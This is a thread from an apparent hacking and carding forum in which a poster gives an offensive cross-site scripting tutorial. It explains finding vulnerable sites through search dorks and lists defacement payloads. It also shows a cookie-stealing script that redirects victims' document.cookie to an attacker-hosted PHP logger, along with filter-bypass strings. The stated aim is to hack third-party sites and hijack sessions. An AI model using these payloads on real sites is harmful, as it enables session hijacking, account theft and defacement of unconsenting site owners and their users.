ICQ # : 623378515

 Buy Verified Sellers Rank | Buy Golden Member Rank

Buy Advertisement Service
    
rescator   cloudshack
freshstuff24
+ Post New Thread
Results 1 to 2 of 2
  1. #1
    My G.F FucK Me Alot Mr Bomb's Avatar
    Join Date
    Jun 2017
    Location
    Pakistan
    Posts
    492
    Thanks
    3
    Thanked 710 Times in 191 Posts
    Blog Entries
    2

    Animbut A complete tutorial on xss (cross site scripting)

    Table Of Contents

    What is XSS?
    Finding XSS Vulnerabilities
    The Basics On XSS
    Deface Methods
    Cookie Stealing
    Filtration Bypassing
    ___________________
    What is XSS?
    'XSS' also known as 'CSS' (Cross Site Scripting, Easily confused with 'Cascading Style Sheets')
    is a very common vulnerbility found in Web Applications, 'XSS' allows the attacker to INSERT
    malicous code,There are many types of XSS there but i will only explain 3 of them and they are most important
    1-'URL XSS' this means that the XSS wont stay on the page it will only get executed if you have the malicous code in the URL and submit the url.

    2- Input fields, Where ever you can insert data, it is very common, to be XSS vulnerable, for example say we found a site with a search engine, Now in the search box you enter 'hacker' now hit enter, when the page loads, if it says your data like 'Found 100 Results For hacker' ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method.

    3-In the Third one you will be able to INSERT data (code) and it will stay on the website.now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles Forums, just most places where you insert data and it stays there. now HTML is totally different then PHP.HTML downloads to your pc and then your 'Browser' parses/interprets the code, (that's why its source is viewable) With PHP the code is interpreted on the server the script is hosted on, then the data is returned to the browser.For PHP injection its rare, But it don't harm to try. Note: PHP code cant be injected into HTML page!

    Finding XSS Vulnerabilities
    Well to start finding these vulnerabilities you can start checking out
    Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's and many things

    Using 'Google Dorks' to make the finding easier, Ok if you wanna get cracking, goto Google.com and type
    inurl:"search.php?q=" now that is a common page and has a lot of results, Now lets move on to the next part

    The Basics On XSS


    To know the basic this Picture may help you


    The most used Xss injection is

    <script>alert("XSS")</script>

    This will alert a popup saying xss if the site is vulnerable and this is easily editable means you can also inject
    Quote:<script>alert("your name or message")</script>
    So going previous i told you a google dork , search.php?q=
    Well we will use this to check for vulnerabilities

    To check if it is vulnerable we type

    www.site.com/search.php?q=<script>alert("your name or message")</script>


    This then gives a popup like this

    [/URL]

    [URL="http://1.bp.blogspot.com/-bgBRn_F6n4A/TVtlYG6p_4I/AAAAAAAAAKM/nDbFCjwoDKk/s1600/Untitled-1.jpg"]


    Many at times this works but if it does not work don't cry we have another way.. :P

    You can try injecting HTMl ;)

    You can put this two strings to inject html

    <h1>anything you want</h1>
    <br><br><b><u>any thing you want</u></b>

    so our url will be

    www.site.com/search.php?q= <h1>anything you want</h1>
    or
    www.site.com/search.php?q=<br><br><b><u>any thing you want</u></b>
    If you see the bold text on the page and newlines then you knows its vuln

    Example






















    Deface Methods
    Well now you understand how XSS works, we can explain some simple XSS deface methods, there
    are many ways for defacing i will mention some of the best and most I used,

    Quote:<html><body><IMG SRC="http://site.com/yourDefaceIMAGE.png"></body></html>

    the first one being IMG SCR, now for those of you who dont know HTML, IMG SCR is a tag, that
    displays the IMAGE linked to it on the webpage.


    ok now if u change the link to a valid picture link, and save it and run it you will see your deface page

    let us say we have have found a Shoutbox, Comment box, or anything that shows your data after you submitted it you could insert the following to make the picture display on the page.


    Ok it helps to make your picture big so it stands out and its clear the site got hacked.

    Another method is using FLASH videos, its the same has the method below but a little more stylish deface.

    Quote:<EMBED SRC="http://site.com/xss.swf"

    that will execute the flash video linked to it.

    Now a popup or a redirection

    <script>window.open( "http://hacking-class.blogspot.com" )</script>

    Cookie Stealing

    This is the best thing about XSS..

    First Get your self a cookie stealer- from here

    ok now you have it save it has a .php file and upload to your server, remember to create the file 'log.txt' too
    and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.

    ok now your gona want to insert this code.

    Quote:window.location = "http://yourserver.com/cookielogger.php?c="+document.cookie

    or

    Quote:document.location = "http://yourserver.com/cookielogger.php?c="+document.cookie
    now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
    the second one is more stealth.

    Now it is the time to hijack the cookies



    Filteration Bypassing


    Alot of sites may seem vulnerable but not executing the code..This will help you

    Some common methods to bypass filteration is

    ')alert('xss');

    or

    ");alert('xss');

    that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.

    You can also try hexing or base64 encoding your data before you submit,

    Please note its bad practice to use alert("XSS") to test for XSS, has ive known sites block the keyword XSS
    before.

    Some other ways to bypass filteration

    Quote:<script type=text/javascript>alert("saurav")</script>
    <script>alert("saurav")</script>;
    <script>alert("saurav");</script>
    <script>alert("/saurav"/)</script>

    Hope that helped you
    More info Contact:
    Skype:bombproductions
    ICQ #:623378515
    ICQ#:911299
    Hidden Content

    I Love virus programming!
    I Love Batch coding!
    I Love Virus!
    I Love Batch!
    I Love Worm programming!
    I Love Worm!
    I Love Trojan!
    FUCK THE SYSTEM!

  2. #2
    Senior Member
    Join Date
    Aug 2017
    Posts
    12
    Thanks
    0
    Thanked 0 Times in 0 Posts
    thanks


 

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •